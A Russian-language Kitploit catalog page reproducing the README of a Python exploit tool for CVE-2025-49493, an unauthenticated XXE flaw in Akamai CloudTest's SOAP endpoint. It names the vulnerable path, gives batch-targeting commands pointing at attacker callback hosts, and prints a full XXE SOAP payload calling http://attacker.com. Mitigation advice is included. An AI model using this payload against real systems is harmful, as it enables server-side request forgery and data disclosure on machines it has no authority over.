Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49493 — Это эксплойт на Python для CVE-2025-49493, который затрагивает версии Akamai CloudTest до 60 2025.06.02 (12988). Уязвимость позволяет выполнять инъекцию внешних сущностей XML (XXE) через конечную точку SOAP-сервиса. | Kitploit
Инструменты/GitHubGitHub/sh4den/cve-2025-49493
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubsh4den/cve-2025-49493

CVE-2025-49493

Это эксплойт на Python для CVE-2025-49493, который затрагивает версии Akamai CloudTest до 60 2025.06.02 (12988). Уязвимость позволяет выполнять инъекцию внешних сущностей XML (XXE) через конечную точку SOAP-сервиса.

Репозиторий
122 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт XXE для Akamai CloudTest (CVE-2025-49493)

Обзор

Это эксплойт на Python для CVE-2025-49493, который затрагивает Akamai CloudTest версий до 60 2025.06.02 (12988). Уязвимость позволяет внедрение XML-внешних сущностей (XXE) через конечную точку SOAP-сервиса.

Детали уязвимости

  • CVE ID: CVE-2025-49493
  • Тип уязвимости: Внедрение XML-внешних сущностей (XXE)
  • Серьёзность: Критическая (CVSS 9.1)
  • Затронутое ПО: Akamai CloudTest
  • Затронутые версии: до 60 2025.06.02 (12988)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет

Технические детали

Уязвимость существует в конечной точке SOAP /concerto/services/RepositoryService, где XML-вход обрабатывается без надлежащей санитизации внешних сущностей. Злоумышленник может создать вредоносные XML-нагрузки для запуска XXE-атак, что может привести к:

  • Раскрытию информации
  • SSRF (Подделка серверных запросов)
  • Отказу в обслуживании
  • Потенциальному удаленному выполнению кода в определенных конфигурациях

Возможности

  • Обнаружение целей: Автоматически определяет экземпляры Akamai CloudTest
  • Обнаружение уязвимости: Проверяет уязвимые конечные точки и индикаторы
  • Эксплуатация XXE: Отправляет сформированные SOAP-запросы с полезными нагрузками XXE
  • Несколько целей: Поддерживает пакетную обработку из файлов целей
  • Детальное логирование: Комплексное цветное логирование с временными метками
  • Обработка ошибок: Надёжная обработка ошибок для сетевых проблем

Установка

Предварительные требования

  • Python 3.6 или выше
  • менеджер пакетов pip

Зависимости

Установите необходимые пакеты:

root@kitploit:~
pip install -r requirements.txt

Или установите вручную:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Использование

Базовое использование

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Расширенное использование

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Параметры командной строки

root@kitploit:~
positional arguments:
  targets              Файл целей, содержащий список хостов Akamai CloudTest
  xxe_server          XXE-сервер для захвата запросов (например, attacker.com или IP)

optional arguments:
  -h, --help          показать это справочное сообщение и выйти
  --timeout TIMEOUT   Тайм-аут запроса в секундах (по умолчанию: 10)

Формат файла целей

Создайте файл targets.txt с одной целью на строку:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Настройка XXE-сервера

Вариант 1: Использование Burp Collaborator

  1. Откройте Burp Suite Professional
  2. Перейдите в Burp > Burp Collaborator client
  3. Нажмите "Copy to clipboard", чтобы получить URL collaborator
  4. Используйте этот URL как параметр xxe_server

Вариант 2: Использование Interactsh

  1. Установите interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Запустите: interactsh-client
  3. Используйте предоставленный URL как параметр xxe_server

Вариант 3: Пользовательский HTTP-сервер

Настройте простой HTTP-сервер для захвата запросов:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Процесс эксплуатации

  1. Проверка цели: Проверяет формат URL и доступность
  2. Обнаружение уязвимости:
    • Проверяет наличие индикаторов CloudTest в ответе
    • Проверяет существование конечной точки SOAP-сервиса
  3. Генерация полезной нагрузки XXE: Создает вредоносный SOAP-конверт с XXE
  4. Эксплуатация: Отправляет сформированный запрос на уязвимую конечную точку
  5. Анализ результата: Анализирует ответ на наличие индикаторов успеха

Структура полезной нагрузки XXE

Эксплойт использует следующую структуру полезной нагрузки XXE:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Смягчение

Для администраторов

  1. Немедленные действия:

    • Обновите Akamai CloudTest до версии 60 2025.06.02 или новее
    • Отслеживайте логи на предмет подозрительной обработки XML
    • Внедрите сегментацию сети для ограничения воздействия
  2. Долгосрочные решения:

    • Отключите обработку внешних сущностей XML в парсерах XML
    • Внедрите проверку ввода и очистку
    • Используйте белые списки для обработки XML
    • Регулярные оценки безопасности

Для разработчиков

  1. Безопасная обработка XML:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Проверка ввода:

    • Проверяйте весь XML-ввод на соответствие строгим схемам
    • Очищайте данные, контролируемые пользователем, перед обработкой XML
    • Внедрите правильную обработку ошибок

Ссылки

  • Оригинальное исследование xbow
  • Журнал изменений Akamai CloudTest
  • Детали CVE-2025-49493
  • Предотвращение XXE от OWASP

Правовое уведомление

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за неправомерное использование или ущерб, причиненный этим инструментом.

Участие в разработке

  1. Сделайте форк репозитория
  2. Создайте ветку функции
  3. Внесите свои изменения
  4. Добавьте тесты, если применимо
  5. Отправьте pull request

Лицензия

Этот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.

Авторы

  • Оригинальное исследование: xbow, 3th1c_yuk1
  • Разработка эксплойта: Security Research Team
  • Назначение CVE: CVE-2025-49493

Журнал изменений

v1.0.0

  • Первоначальный релиз
  • Базовая функциональность эксплуатации XXE
  • Поддержка файла целей
  • Комплексное логирование
  • Улучшения обработки ошибок
Скачать инструмент